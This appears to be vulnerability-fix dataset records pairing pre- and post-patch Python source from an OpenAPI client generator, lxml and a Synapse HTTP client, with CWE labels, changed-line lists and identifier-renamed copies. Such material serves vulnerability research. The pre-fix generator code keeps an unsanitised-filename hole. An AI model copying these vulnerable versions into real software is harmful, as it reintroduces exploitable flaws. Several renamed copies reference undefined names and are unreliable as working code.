def FUNC_10(self) -> None:
VAR_16 = self.package_dir / "models"
VAR_16.mkdir()
VAR_17 = VAR_16 / "__init__.py"
VAR_18 = []
VAR_19 = self.env.get_template("types.py")
VAR_20 = VAR_16 / "types.py"
VAR_20.write_text(VAR_19.render())
VAR_21 = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
VAR_36 = VAR_16 / f"{model.reference.module_name}.py"
VAR_36.write_text(VAR_21.render(model=model))
VAR_18.append(import_string_from_reference(model.reference))
VAR_22 = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
VAR_36 = VAR_16 / f"{enum.reference.module_name}.py"
VAR_36.write_text(VAR_22.render(enum=enum))
VAR_18.append(import_string_from_reference(enum.reference))
VAR_23 = self.env.get_template("models_init.pyi")
VAR_17.write_text(VAR_23.render(VAR_18=imports))
def FUNC_11(self) -> None:
VAR_24 = self.package_dir / "client.py"
VAR_25 = self.env.get_template("client.pyi")
VAR_24.write_text(VAR_25.render())
VAR_26 = self.package_dir / "api"
VAR_26.mkdir()
VAR_27 = VAR_26 / "__init__.py"
VAR_27.write_text('""" Contains synchronous methods for accessing the API """')
VAR_28 = self.package_dir / "async_api"
VAR_28.mkdir()
VAR_29 = VAR_28 / "__init__.py"
VAR_29.write_text('""" Contains async methods for accessing the API """')
VAR_30 = self.package_dir / "errors.py"
VAR_31 = self.env.get_template("errors.pyi")
VAR_30.write_text(VAR_31.render())
VAR_32 = self.env.get_template("endpoint_module.pyi")
VAR_33 = self.env.get_template("async_endpoint_module.pyi")
for tag, collection in self.openapi.endpoint_collections_by_tag.items():
VAR_36 = VAR_26 / f"{tag}.py"
VAR_36.write_text(VAR_32.render(collection=collection))
VAR_37 = VAR_28 / f"{tag}.py"
VAR_37.write_text(VAR_33.render(collection=collection))
|
from __future__ import annotations
import shutil
import subprocess
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Sequence, Union
import httpcore
import httpx
import yaml
from jinja2 import Environment, PackageLoader
from openapi_python_client import utils
from .parser import GeneratorData, import_string_from_reference
from .parser.errors import GeneratorError
if sys.version_info.minor == 7: # version did not exist in 3.7, need to use a backport
from importlib_metadata import version
else:
from importlib.metadata import version # type: ignore
__version__ = version(__package__)
def FUNC_0(VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[CLASS_0, GeneratorError]:
VAR_2 = FUNC_3(VAR_0=url, VAR_1=path)
if isinstance(VAR_2, GeneratorError):
return VAR_2
VAR_3 = GeneratorData.from_dict(VAR_2)
if isinstance(VAR_3, GeneratorError):
return VAR_3
return CLASS_0(VAR_3=openapi)
def FUNC_1(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.build()
def FUNC_2(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Sequence[GeneratorError]:
VAR_4 = FUNC_0(VAR_0=url, VAR_1=path)
if isinstance(VAR_4, GeneratorError):
return [VAR_4]
return VAR_4.update()
def FUNC_3(*, VAR_0: Optional[str], VAR_1: Optional[Path]) -> Union[Dict[str, Any], GeneratorError]:
VAR_35: bytes
if VAR_0 is not None and VAR_1 is not None:
return GeneratorError(header="Provide URL or Path, not both.")
if VAR_0 is not None:
try:
VAR_34 = httpx.get(VAR_0)
VAR_35 = VAR_34.content
except (httpx.HTTPError, httpcore.NetworkError):
return GeneratorError(header="Could not get OpenAPI document from provided URL")
elif VAR_1 is not None:
VAR_35 = VAR_1.read_bytes()
else:
return GeneratorError(header="No URL or Path provided")
try:
return yaml.safe_load(VAR_35)
except yaml.YAMLError:
return GeneratorError(header="Invalid YAML from provided source")
class CLASS_0:
VAR_5 = {"snakecase": utils.snake_case, "kebabcase": utils.kebab_case}
project_name_override: Optional[str] = None
package_name_override: Optional[str] = None
def __init__(self, *, VAR_3: GeneratorData) -> None:
self.openapi: GeneratorData = VAR_3
self.env: Environment = Environment(loader=PackageLoader(__package__), trim_blocks=True, lstrip_blocks=True)
self.project_name: str = self.project_name_override or f"{utils.kebab_case(VAR_3.title).lower()}-client"
self.project_dir: Path = Path.cwd() / self.project_name
self.package_name: str = self.package_name_override or self.project_name.replace("-", "_")
self.package_dir: Path = self.project_dir / self.package_name
self.package_description: str = f"A client library for accessing {self.openapi.title}"
self.version: str = VAR_3.version
self.env.filters.update(self.TEMPLATE_FILTERS)
def FUNC_4(self) -> Sequence[GeneratorError]:
print(f"Generating {self.project_name}")
try:
self.project_dir.mkdir()
except FileExistsError:
return [GeneratorError(detail="Directory already exists. Delete it or use the FUNC_5 command.")]
self._create_package()
self._build_metadata()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_5(self) -> Sequence[GeneratorError]:
if not self.package_dir.is_dir():
raise FileNotFoundError()
print(f"Updating {self.project_name}")
shutil.rmtree(self.package_dir)
self._create_package()
self._build_models()
self._build_api()
self._reformat()
return self._get_errors()
def FUNC_6(self) -> None:
subprocess.run(
"isort .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
)
subprocess.run("black .", cwd=self.project_dir, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def FUNC_7(self) -> Sequence[GeneratorError]:
VAR_6 = []
for collection in self.openapi.endpoint_collections_by_tag.values():
VAR_6.extend(collection.parse_errors)
VAR_6.extend(self.openapi.schemas.errors)
return VAR_6
def FUNC_8(self) -> None:
self.package_dir.mkdir()
VAR_7 = self.package_dir / "__init__.py"
VAR_8 = self.env.get_template("package_init.pyi")
VAR_7.write_text(VAR_8.render(description=self.package_description))
VAR_9 = self.package_dir / "py.typed"
VAR_9.write_text("# Marker file for PEP 561")
def FUNC_9(self) -> None:
VAR_10 = self.env.get_template("pyproject.toml")
VAR_11 = self.project_dir / "pyproject.toml"
VAR_11.write_text(
VAR_10.render(
project_name=self.project_name,
package_name=self.package_name,
version=self.version,
description=self.package_description,
)
)
VAR_12 = self.project_dir / "README.md"
VAR_13 = self.env.get_template("README.md")
VAR_12.write_text(
VAR_13.render(
project_name=self.project_name, description=self.package_description, package_name=self.package_name
)
)
VAR_14 = self.project_dir / ".gitignore"
VAR_15 = self.env.get_template(".gitignore")
VAR_14.write_text(VAR_15.render())
def FUNC_10(self) -> None:
VAR_16 = self.package_dir / "models"
VAR_16.mkdir()
VAR_17 = VAR_16 / "__init__.py"
VAR_18 = []
VAR_19 = self.env.get_template("types.py")
VAR_20 = VAR_16 / "types.py"
VAR_20.write_text(VAR_19.render())
VAR_21 = self.env.get_template("model.pyi")
for model in self.openapi.schemas.models.values():
VAR_36 = VAR_16 / f"{model.reference.module_name}.py"
VAR_36.write_text(VAR_21.render(model=model))
VAR_18.append(import_string_from_reference(model.reference))
VAR_22 = self.env.get_template("enum.pyi")
for enum in self.openapi.enums.values():
VAR_36 = VAR_16 / f"{enum.reference.module_name}.py"
VAR_36.write_text(VAR_22.render(enum=enum))
VAR_18.append(import_string_from_reference(enum.reference))
VAR_23 = self.env.get_template("models_init.pyi")
VAR_17.write_text(VAR_23.render(VAR_18=imports))
def FUNC_11(self) -> None:
VAR_24 = self.package_dir / "client.py"
VAR_25 = self.env.get_template("client.pyi")
VAR_24.write_text(VAR_25.render())
VAR_26 = self.package_dir / "api"
VAR_26.mkdir()
VAR_27 = VAR_26 / "__init__.py"
VAR_27.write_text('""" Contains synchronous methods for accessing the API """')
VAR_28 = self.package_dir / "async_api"
VAR_28.mkdir()
VAR_29 = VAR_28 / "__init__.py"
VAR_29.write_text('""" Contains async methods for accessing the API """')
VAR_30 = self.package_dir / "errors.py"
VAR_31 = self.env.get_template("errors.pyi")
VAR_30.write_text(VAR_31.render())
VAR_32 = self.env.get_template("endpoint_module.pyi")
VAR_33 = self.env.get_template("async_endpoint_module.pyi")
for VAR_37, collection in self.openapi.endpoint_collections_by_tag.items():
VAR_37 = utils.snake_case(VAR_37)
VAR_36 = VAR_26 / f"{VAR_37}.py"
VAR_36.write_text(VAR_32.render(collection=collection))
VAR_38 = VAR_28 / f"{VAR_37}.py"
VAR_38.write_text(VAR_33.render(collection=collection))
| [
3,
9,
14,
16,
19,
24,
25,
27,
28,
37,
38,
42,
50,
51,
55,
63,
64,
83,
84,
89,
93,
96,
101,
103,
106,
118,
121,
131,
137,
144,
147,
149,
152,
155,
157,
168,
169,
177,
178,
182,
184,
189,
193,
199,
200,
206,
209,
211,
215,
216,
221,
226,
230,
238,
1,
40,
41,
42,
43,
44,
45,
53,
54,
55,
56,
57,
58,
105,
120
] | [
3,
9,
14,
16,
19,
24,
25,
27,
28,
37,
38,
42,
50,
51,
55,
63,
64,
83,
84,
89,
93,
96,
101,
103,
106,
118,
121,
131,
137,
144,
147,
149,
152,
155,
157,
168,
169,
177,
178,
182,
184,
189,
193,
199,
200,
206,
209,
211,
215,
216,
221,
226,
230,
239,
1,
40,
41,
42,
43,
44,
45,
53,
54,
55,
56,
57,
58,
105,
120
] |
1CWE-79
| # this is a package
__version__ = "4.6.4"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| # this is a package
__version__ = "4.6.5"
def get_include():
"""
Returns a list of header include paths (for lxml itself, libxml2
and libxslt) needed to compile C code against lxml if it was built
with statically linked libraries.
"""
import os
lxml_path = __path__[0]
include_path = os.path.join(lxml_path, 'includes')
includes = [include_path, lxml_path]
for name in os.listdir(include_path):
path = os.path.join(include_path, name)
if os.path.isdir(path):
includes.append(path)
return includes
| xss | {
"code": [
"__version__ = \"4.6.4\""
],
"line_no": [
3
]
} | {
"code": [
"__version__ = \"4.6.5\""
],
"line_no": [
3
]
} |
__version__ = "4.6.4"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
|
__version__ = "4.6.5"
def FUNC_0():
import os
VAR_0 = __path__[0]
VAR_1 = os.path.join(VAR_0, 'includes')
VAR_2 = [VAR_1, VAR_0]
for name in os.listdir(VAR_1):
VAR_3 = os.path.join(VAR_1, name)
if os.path.isdir(VAR_3):
VAR_2.append(VAR_3)
return VAR_2
| [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] | [
1,
2,
4,
5,
16,
21,
23,
24,
7,
8,
9,
10,
11
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2018 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from io import BytesIO
from typing import (
TYPE_CHECKING,
Any,
BinaryIO,
Dict,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Union,
)
import treq
from canonicaljson import encode_canonical_json
from netaddr import IPAddress, IPSet
from prometheus_client import Counter
from zope.interface import implementer, provider
from OpenSSL import SSL
from OpenSSL.SSL import VERIFY_NONE
from twisted.internet import defer, error as twisted_error, protocol, ssl
from twisted.internet.interfaces import (
IAddress,
IHostResolution,
IReactorPluggableNameResolver,
IResolutionReceiver,
)
from twisted.internet.task import Cooperator
from twisted.python.failure import Failure
from twisted.web._newclient import ResponseDone
from twisted.web.client import (
Agent,
HTTPConnectionPool,
ResponseNeverReceived,
readBody,
)
from twisted.web.http import PotentialDataLoss
from twisted.web.http_headers import Headers
from twisted.web.iweb import IAgent, IBodyProducer, IResponse
from synapse.api.errors import Codes, HttpResponseException, SynapseError
from synapse.http import QuieterFileBodyProducer, RequestTimedOutError, redact_uri
from synapse.http.proxyagent import ProxyAgent
from synapse.logging.context import make_deferred_yieldable
from synapse.logging.opentracing import set_tag, start_active_span, tags
from synapse.util import json_decoder
from synapse.util.async_helpers import timeout_deferred
if TYPE_CHECKING:
from synapse.app.homeserver import HomeServer
logger = logging.getLogger(__name__)
outgoing_requests_counter = Counter("synapse_http_client_requests", "", ["method"])
incoming_responses_counter = Counter(
"synapse_http_client_responses", "", ["method", "code"]
)
# the type of the headers list, to be passed to the t.w.h.Headers.
# Actually we can mix str and bytes keys, but Mapping treats 'key' as invariant so
# we simplify.
RawHeaders = Union[Mapping[str, "RawHeaderValue"], Mapping[bytes, "RawHeaderValue"]]
# the value actually has to be a List, but List is invariant so we can't specify that
# the entries can either be Lists or bytes.
RawHeaderValue = Sequence[Union[str, bytes]]
# the type of the query params, to be passed into `urlencode`
QueryParamValue = Union[str, bytes, Iterable[Union[str, bytes]]]
QueryParams = Union[Mapping[str, QueryParamValue], Mapping[bytes, QueryParamValue]]
def check_against_blacklist(
ip_address: IPAddress, ip_whitelist: Optional[IPSet], ip_blacklist: IPSet
) -> bool:
"""
Compares an IP address to allowed and disallowed IP sets.
Args:
ip_address: The IP address to check
ip_whitelist: Allowed IP addresses.
ip_blacklist: Disallowed IP addresses.
Returns:
True if the IP address is in the blacklist and not in the whitelist.
"""
if ip_address in ip_blacklist:
if ip_whitelist is None or ip_address not in ip_whitelist:
return True
return False
_EPSILON = 0.00000001
def _make_scheduler(reactor):
"""Makes a schedular suitable for a Cooperator using the given reactor.
(This is effectively just a copy from `twisted.internet.task`)
"""
def _scheduler(x):
return reactor.callLater(_EPSILON, x)
return _scheduler
class IPBlacklistingResolver:
"""
A proxy for reactor.nameResolver which only produces non-blacklisted IP
addresses, preventing DNS rebinding attacks on URL preview.
"""
def __init__(
self,
reactor: IReactorPluggableNameResolver,
ip_whitelist: Optional[IPSet],
ip_blacklist: IPSet,
):
"""
Args:
reactor: The twisted reactor.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._reactor = reactor
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def resolveHostName(
self, recv: IResolutionReceiver, hostname: str, portNumber: int = 0
) -> IResolutionReceiver:
r = recv()
addresses = [] # type: List[IAddress]
def _callback() -> None:
r.resolutionBegan(None)
has_bad_ip = False
for i in addresses:
ip_address = IPAddress(i.host)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info(
"Dropped %s from DNS resolution to %s due to blacklist"
% (ip_address, hostname)
)
has_bad_ip = True
# if we have a blacklisted IP, we'd like to raise an error to block the
# request, but all we can really do from here is claim that there were no
# valid results.
if not has_bad_ip:
for i in addresses:
r.addressResolved(i)
r.resolutionComplete()
@provider(IResolutionReceiver)
class EndpointReceiver:
@staticmethod
def resolutionBegan(resolutionInProgress: IHostResolution) -> None:
pass
@staticmethod
def addressResolved(address: IAddress) -> None:
addresses.append(address)
@staticmethod
def resolutionComplete() -> None:
_callback()
self._reactor.nameResolver.resolveHostName(
EndpointReceiver, hostname, portNumber=portNumber
)
return r
class BlacklistingAgentWrapper(Agent):
"""
An Agent wrapper which will prevent access to IP addresses being accessed
directly (without an IP address lookup).
"""
def __init__(
self,
agent: IAgent,
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
):
"""
Args:
agent: The Agent to wrap.
ip_whitelist: IP addresses to allow.
ip_blacklist: IP addresses to disallow.
"""
self._agent = agent
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
def request(
self,
method: bytes,
uri: bytes,
headers: Optional[Headers] = None,
bodyProducer: Optional[IBodyProducer] = None,
) -> defer.Deferred:
h = urllib.parse.urlparse(uri.decode("ascii"))
try:
ip_address = IPAddress(h.hostname)
if check_against_blacklist(
ip_address, self._ip_whitelist, self._ip_blacklist
):
logger.info("Blocking access to %s due to blacklist" % (ip_address,))
e = SynapseError(403, "IP address blocked by IP blacklist entry")
return defer.fail(Failure(e))
except Exception:
# Not an IP
pass
return self._agent.request(
method, uri, headers=headers, bodyProducer=bodyProducer
)
class SimpleHttpClient:
"""
A simple, no-frills HTTP client with methods that wrap up common ways of
using HTTP in Matrix
"""
def __init__(
self,
hs: "HomeServer",
treq_args: Dict[str, Any] = {},
ip_whitelist: Optional[IPSet] = None,
ip_blacklist: Optional[IPSet] = None,
http_proxy: Optional[bytes] = None,
https_proxy: Optional[bytes] = None,
):
"""
Args:
hs
treq_args: Extra keyword arguments to be given to treq.request.
ip_blacklist: The IP addresses that are blacklisted that
we may not request.
ip_whitelist: The whitelisted IP addresses, that we can
request if it were otherwise caught in a blacklist.
http_proxy: proxy server to use for http connections. host[:port]
https_proxy: proxy server to use for https connections. host[:port]
"""
self.hs = hs
self._ip_whitelist = ip_whitelist
self._ip_blacklist = ip_blacklist
self._extra_treq_args = treq_args
self.user_agent = hs.version_string
self.clock = hs.get_clock()
if hs.config.user_agent_suffix:
self.user_agent = "%s %s" % (self.user_agent, hs.config.user_agent_suffix)
# We use this for our body producers to ensure that they use the correct
# reactor.
self._cooperator = Cooperator(scheduler=_make_scheduler(hs.get_reactor()))
self.user_agent = self.user_agent.encode("ascii")
if self._ip_blacklist:
real_reactor = hs.get_reactor()
# If we have an IP blacklist, we need to use a DNS resolver which
# filters out blacklisted IP addresses, to prevent DNS rebinding.
nameResolver = IPBlacklistingResolver(
real_reactor, self._ip_whitelist, self._ip_blacklist
)
@implementer(IReactorPluggableNameResolver)
class Reactor:
def __getattr__(_self, attr):
if attr == "nameResolver":
return nameResolver
else:
return getattr(real_reactor, attr)
self.reactor = Reactor()
else:
self.reactor = hs.get_reactor()
# the pusher makes lots of concurrent SSL connections to sygnal, and
# tends to do so in batches, so we need to allow the pool to keep
# lots of idle connections around.
pool = HTTPConnectionPool(self.reactor)
# XXX: The justification for using the cache factor here is that larger instances
# will need both more cache and more connections.
# Still, this should probably be a separate dial
pool.maxPersistentPerHost = max((100 * hs.config.caches.global_factor, 5))
pool.cachedConnectionTimeout = 2 * 60
self.agent = ProxyAgent(
self.reactor,
connectTimeout=15,
contextFactory=self.hs.get_http_client_context_factory(),
pool=pool,
http_proxy=http_proxy,
https_proxy=https_proxy,
)
if self._ip_blacklist:
# If we have an IP blacklist, we then install the blacklisting Agent
# which prevents direct access to IP addresses, that are not caught
# by the DNS resolution.
self.agent = BlacklistingAgentWrapper(
self.agent,
ip_whitelist=self._ip_whitelist,
ip_blacklist=self._ip_blacklist,
)
async def request(
self,
method: str,
uri: str,
data: Optional[bytes] = None,
headers: Optional[Headers] = None,
) -> IResponse:
"""
Args:
method: HTTP method to use.
uri: URI to query.
data: Data to send in the request body, if applicable.
headers: Request headers.
Returns:
Response object, once the headers have been read.
Raises:
RequestTimedOutError if the request times out before the headers are read
"""
outgoing_requests_counter.labels(method).inc()
# log request but strip `access_token` (AS requests for example include this)
logger.debug("Sending request %s %s", method, redact_uri(uri))
with start_active_span(
"outgoing-client-request",
tags={
tags.SPAN_KIND: tags.SPAN_KIND_RPC_CLIENT,
tags.HTTP_METHOD: method,
tags.HTTP_URL: uri,
},
finish_on_close=True,
):
try:
body_producer = None
if data is not None:
body_producer = QuieterFileBodyProducer(
BytesIO(data), cooperator=self._cooperator,
)
request_deferred = treq.request(
method,
uri,
agent=self.agent,
data=body_producer,
headers=headers,
**self._extra_treq_args,
) # type: defer.Deferred
# we use our own timeout mechanism rather than treq's as a workaround
# for https://twistedmatrix.com/trac/ticket/9534.
request_deferred = timeout_deferred(
request_deferred, 60, self.hs.get_reactor(),
)
# turn timeouts into RequestTimedOutErrors
request_deferred.addErrback(_timeout_to_request_timed_out_error)
response = await make_deferred_yieldable(request_deferred)
incoming_responses_counter.labels(method, response.code).inc()
logger.info(
"Received response to %s %s: %s",
method,
redact_uri(uri),
response.code,
)
return response
except Exception as e:
incoming_responses_counter.labels(method, "ERR").inc()
logger.info(
"Error sending request to %s %s: %s %s",
method,
redact_uri(uri),
type(e).__name__,
e.args[0],
)
set_tag(tags.ERROR, True)
set_tag("error_reason", e.args[0])
raise
async def post_urlencoded_get_json(
self,
uri: str,
args: Optional[Mapping[str, Union[str, List[str]]]] = None,
headers: Optional[RawHeaders] = None,
) -> Any:
"""
Args:
uri: uri to query
args: parameters to be url-encoded in the body
headers: a map from header name to a list of values for that header
Returns:
parsed json
Raises:
RequestTimedOutError: if there is a timeout before the response headers
are received. Note there is currently no timeout on reading the response
body.
HttpResponseException: On a non-2xx HTTP response.
ValueError: if the response was not JSON
"""
# TODO: Do we ever want to log message contents?
logger.debug("post_urlencoded_get_json args: %s", args)
query_bytes = encode_query_args(args)
actual_headers = {
b"Content-Type": [b"application/x-www-form-urlencoded"],
b"User-Agent": [self.user_agent],
b"Accept": [b"application/json"],
}
if headers:
actual_headers.update(headers) # type: ignore
response = await self.request(
"POST", uri, headers=Headers(actual_headers), data=query_bytes
)
body = await make_deferred_yieldable(readBody(response))
if 200 <= response.code < 300:
return json_decoder.decode(body.decode("utf-8"))
else:
raise HttpResponseException(
response.code, response.phrase.decode("ascii", errors="replace"), body
)
async def post_json_get_json(
    self, uri: str, post_json: Any, headers: Optional[RawHeaders] = None
) -> Any:
    """POSTs a canonical-JSON-encoded body to `uri` and parses the JSON reply.

    Args:
        uri: URI to query.
        post_json: request body, to be encoded as json
        headers: a map from header name to a list of values for that header

    Returns:
        parsed json

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        HttpResponseException: On a non-2xx HTTP response.
        ValueError: if the response was not JSON
    """
    json_str = encode_canonical_json(post_json)

    logger.debug("HTTP POST %s -> %s", json_str, uri)

    # Start from our defaults, then let the caller override/extend them.
    request_headers = {
        b"Content-Type": [b"application/json"],
        b"User-Agent": [self.user_agent],
        b"Accept": [b"application/json"],
    }
    if headers:
        request_headers.update(headers)  # type: ignore

    response = await self.request(
        "POST", uri, headers=Headers(request_headers), data=json_str
    )

    body = await make_deferred_yieldable(readBody(response))

    # Guard clause: surface any non-2xx response as an exception.
    if not (200 <= response.code < 300):
        raise HttpResponseException(
            response.code, response.phrase.decode("ascii", errors="replace"), body
        )

    return json_decoder.decode(body.decode("utf-8"))
async def get_json(
    self,
    uri: str,
    args: Optional[QueryParams] = None,
    headers: Optional[RawHeaders] = None,
) -> Any:
    """Gets some json from the given URI.

    Args:
        uri: The URI to request, not including query parameters
        args: A dictionary used to create query string
        headers: a map from header name to a list of values for that header

    Returns:
        Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        HttpResponseException On a non-2xx HTTP response.
        ValueError: if the response was not JSON
    """
    # Advertise that we want JSON; caller-supplied headers may override this.
    actual_headers = {b"Accept": [b"application/json"]}
    if headers:
        actual_headers.update(headers)  # type: ignore

    # BUG FIX: the merged `actual_headers` dict was previously built but the
    # original `headers` argument was forwarded instead, so the Accept header
    # was silently dropped. Forward the merged dict.
    body = await self.get_raw(uri, args, headers=actual_headers)
    return json_decoder.decode(body.decode("utf-8"))
async def put_json(
    self,
    uri: str,
    json_body: Any,
    args: Optional[QueryParams] = None,
    headers: Optional[RawHeaders] = None,
) -> Any:
    """Puts some json to the given URI.

    Args:
        uri: The URI to request, not including query parameters
        json_body: The JSON to put in the HTTP body,
        args: A dictionary used to create query strings
        headers: a map from header name to a list of values for that header

    Returns:
        Succeeds when we get a 2xx HTTP response, with the HTTP body as JSON.

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        HttpResponseException On a non-2xx HTTP response.
        ValueError: if the response was not JSON
    """
    if args:
        # doseq=True so list-valued args become repeated key=value pairs.
        query_str = urllib.parse.urlencode(args, True)
        uri = "%s?%s" % (uri, query_str)

    json_str = encode_canonical_json(json_body)

    # Default headers; caller-supplied headers may override any of these.
    actual_headers = {
        b"Content-Type": [b"application/json"],
        b"User-Agent": [self.user_agent],
        b"Accept": [b"application/json"],
    }
    if headers:
        actual_headers.update(headers)  # type: ignore

    response = await self.request(
        "PUT", uri, headers=Headers(actual_headers), data=json_str
    )

    body = await make_deferred_yieldable(readBody(response))

    if 200 <= response.code < 300:
        return json_decoder.decode(body.decode("utf-8"))
    else:
        raise HttpResponseException(
            response.code, response.phrase.decode("ascii", errors="replace"), body
        )
async def get_raw(
    self,
    uri: str,
    args: Optional[QueryParams] = None,
    headers: Optional[RawHeaders] = None,
) -> bytes:
    """Gets raw text from the given URI.

    Args:
        uri: The URI to request, not including query parameters
        args: A dictionary used to create query strings
        headers: a map from header name to a list of values for that header

    Returns:
        Succeeds when we get a 2xx HTTP response, with the
        HTTP body as bytes.

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        HttpResponseException on a non-2xx HTTP response.
    """
    if args:
        # doseq=True so list-valued args become repeated key=value pairs.
        query_str = urllib.parse.urlencode(args, True)
        uri = "%s?%s" % (uri, query_str)

    # Always send a User-Agent; caller-supplied headers may override it.
    actual_headers = {b"User-Agent": [self.user_agent]}
    if headers:
        actual_headers.update(headers)  # type: ignore

    response = await self.request("GET", uri, headers=Headers(actual_headers))

    body = await make_deferred_yieldable(readBody(response))

    if 200 <= response.code < 300:
        return body
    else:
        raise HttpResponseException(
            response.code, response.phrase.decode("ascii", errors="replace"), body
        )
# XXX: FIXME: This is horribly copy-pasted from matrixfederationclient.
# The two should be factored out.

async def get_file(
    self,
    url: str,
    output_stream: BinaryIO,
    max_size: Optional[int] = None,
    headers: Optional[RawHeaders] = None,
) -> Tuple[int, Dict[bytes, List[bytes]], str, int]:
    """GETs a file from a given URL

    Args:
        url: The URL to GET
        output_stream: File to write the response body to.
        max_size: Maximum allowed body size in bytes, or None for no limit.
        headers: A map from header name to a list of values for that header

    Returns:
        A tuple of the file length, dict of the response
        headers, absolute URI of the response and HTTP response code.

    Raises:
        RequestTimedOutError: if there is a timeout before the response headers
            are received. Note there is currently no timeout on reading the
            response body.
        SynapseError: if the response is not a 2xx, the remote file is too large, or
            another exception happens during the download.
    """
    actual_headers = {b"User-Agent": [self.user_agent]}
    if headers:
        actual_headers.update(headers)  # type: ignore

    response = await self.request("GET", url, headers=Headers(actual_headers))

    resp_headers = dict(response.headers.getAllRawHeaders())

    # Fail fast when the server advertises a too-large Content-Length; the
    # limit is enforced again while streaming, in readBodyToFile.
    if (
        b"Content-Length" in resp_headers
        and max_size
        and int(resp_headers[b"Content-Length"][0]) > max_size
    ):
        logger.warning("Requested URL is too large > %r bytes" % (max_size,))
        raise SynapseError(
            502,
            "Requested file is too large > %r bytes" % (max_size,),
            Codes.TOO_LARGE,
        )

    if response.code > 299:
        logger.warning("Got %d when downloading %s" % (response.code, url))
        raise SynapseError(502, "Got error %d" % (response.code,), Codes.UNKNOWN)

    # TODO: if our Content-Type is HTML or something, just read the first
    # N bytes into RAM rather than saving it all to disk only to read it
    # straight back in again

    try:
        # Stream the body straight into output_stream rather than buffering it.
        length = await make_deferred_yieldable(
            readBodyToFile(response, output_stream, max_size)
        )
    except SynapseError:
        # This can happen e.g. because the body is too large.
        raise
    except Exception as e:
        raise SynapseError(502, ("Failed to download remote body: %s" % e)) from e

    return (
        length,
        resp_headers,
        response.request.absoluteURI.decode("ascii"),
        response.code,
    )
def _timeout_to_request_timed_out_error(f: Failure):
    """Errback helper: translate Twisted timeout failures into RequestTimedOutError.

    Any other failure is passed through unchanged.
    """
    if f.check(twisted_error.TimeoutError, twisted_error.ConnectingCancelledError):
        # The TCP connection has its own timeout (the Agent's 'connectTimeout'
        # parameter), which surfaces as twisted_error.TimeoutError.
        raise RequestTimedOutError("Timeout connecting to remote server")
    if f.check(defer.TimeoutError, ResponseNeverReceived):
        # Our overall per-request timeout (see timeout_deferred) fired.
        raise RequestTimedOutError("Timeout waiting for response from remote server")

    return f
class _ReadBodyToFileProtocol(protocol.Protocol):
    """Streams an HTTP response body into a file-like object, optionally
    enforcing a maximum body size.

    The number of bytes written is delivered via the supplied Deferred; a
    SynapseError is delivered instead if the size limit is exceeded.
    """

    def __init__(
        self, stream: BinaryIO, deferred: defer.Deferred, max_size: Optional[int]
    ):
        # File-like object the body is written to.
        self.stream = stream
        # Fires with the body length on success, or errbacks on failure.
        self.deferred = deferred
        # Number of bytes received so far.
        self.length = 0
        # Maximum number of bytes to accept, or None for unlimited.
        self.max_size = max_size

    def dataReceived(self, data: bytes) -> None:
        self.stream.write(data)
        self.length += len(data)
        if self.max_size is not None and self.length >= self.max_size:
            self.deferred.errback(
                SynapseError(
                    502,
                    "Requested file is too large > %r bytes" % (self.max_size,),
                    Codes.TOO_LARGE,
                )
            )
            # Swap in a fresh, unobserved Deferred so the connectionLost that
            # follows loseConnection() below cannot clobber the errback we
            # just delivered.
            self.deferred = defer.Deferred()
            self.transport.loseConnection()

    def connectionLost(self, reason: Failure) -> None:
        if reason.check(ResponseDone):
            self.deferred.callback(self.length)
        elif reason.check(PotentialDataLoss):
            # stolen from https://github.com/twisted/treq/pull/49/files
            # http://twistedmatrix.com/trac/ticket/4840
            self.deferred.callback(self.length)
        else:
            self.deferred.errback(reason)
def readBodyToFile(
    response: IResponse, stream: BinaryIO, max_size: Optional[int]
) -> defer.Deferred:
    """
    Read a HTTP response body to a file-object. Optionally enforcing a maximum file size.

    Args:
        response: The HTTP response to read from.
        stream: The file-object to write to.
